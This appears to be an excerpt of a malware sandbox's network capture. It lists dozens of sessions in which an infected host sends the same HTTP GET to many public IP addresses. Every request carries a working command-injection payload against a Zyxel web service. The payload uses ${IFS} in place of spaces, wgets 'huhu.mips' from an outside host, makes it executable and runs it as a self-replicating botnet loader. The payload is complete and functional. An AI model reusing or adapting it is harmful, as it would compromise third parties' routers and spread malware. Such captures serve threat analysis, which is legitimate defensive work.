                                                  5385192.168.2.1358250217.45.121.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143716097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5386192.168.2.134361062.156.100.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143768072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5387192.168.2.1360162117.58.17.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143802881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5388192.168.2.133763265.51.167.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143838882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5389192.168.2.1342114135.213.184.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143893957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5390192.168.2.135931681.59.248.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143927097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5391192.168.2.1352024206.121.233.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143975019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5392192.168.2.1333948155.141.193.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144020081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5393192.168.2.135855289.179.130.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144069910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5394192.168.2.1360442178.52.228.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144109964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5395192.168.2.134806072.179.136.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144145012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5396192.168.2.135876882.104.239.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144177914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5397192.168.2.1352444121.82.243.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144237041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5398192.168.2.135410866.214.9.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144272089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5399192.168.2.133355642.248.80.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144299030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5400192.168.2.1356420209.169.118.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144336939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5401192.168.2.1334186176.90.115.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144373894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5402192.168.2.133301836.87.82.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144432068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5403192.168.2.1333468205.61.202.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144483089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5404192.168.2.134233651.217.194.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144515991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5405192.168.2.1353098179.142.134.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144553900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5406192.168.2.1355840174.228.158.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144576073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5407192.168.2.133492424.24.94.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144603014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5408192.168.2.1336770189.177.25.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144654036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5409192.168.2.1353432162.66.124.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144675016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5410192.168.2.133876487.61.252.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144716024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5411192.168.2.1340784165.26.8.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144778967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5412192.168.2.134336676.255.2.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144798040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5413192.168.2.1347862118.35.121.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144831896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5414192.168.2.133980898.62.234.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144881010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5415192.168.2.133569052.166.230.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144934893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5416192.168.2.1353366152.202.159.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.144951105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5417192.168.2.1341046209.209.218.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145004034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5418192.168.2.13554102.26.233.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145045996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5419192.168.2.1348092167.196.188.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145092964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5420192.168.2.133411459.38.243.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145132065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5421192.168.2.13547524.184.155.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145165920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5422192.168.2.1339096139.255.54.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145217896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5423192.168.2.1358084152.76.119.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145246029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5424192.168.2.1359684117.144.160.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145279884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5425192.168.2.135140854.50.57.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145303965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5426192.168.2.1335736161.102.48.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145364046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5427192.168.2.133368672.99.153.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145386934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5428192.168.2.1348616188.213.78.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145447016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5429192.168.2.133393479.236.208.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145473003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5430192.168.2.1338848165.123.48.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145519018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5431192.168.2.135897497.32.42.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145559072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5432192.168.2.135554272.105.45.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145591974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5433192.168.2.133554887.153.167.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145643950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5434192.168.2.1338748194.72.109.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145664930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5435192.168.2.136046692.173.16.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145698071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5436192.168.2.1337440218.245.14.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145749092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5437192.168.2.1345498105.26.109.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145777941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5438192.168.2.135796825.189.217.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145824909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5439192.168.2.133735239.151.221.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145876884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5440192.168.2.135355499.131.122.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145905018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5441192.168.2.135344036.199.94.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145942926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5442192.168.2.1340898124.161.111.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.145992994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5443192.168.2.134873085.88.104.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146045923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5444192.168.2.135362474.3.46.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146070957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5445192.168.2.1358848161.52.252.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146119118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5446192.168.2.133697473.213.178.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146156073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5447192.168.2.1334078153.196.111.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.146198988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5448192.168.2.136089473.177.21.207443
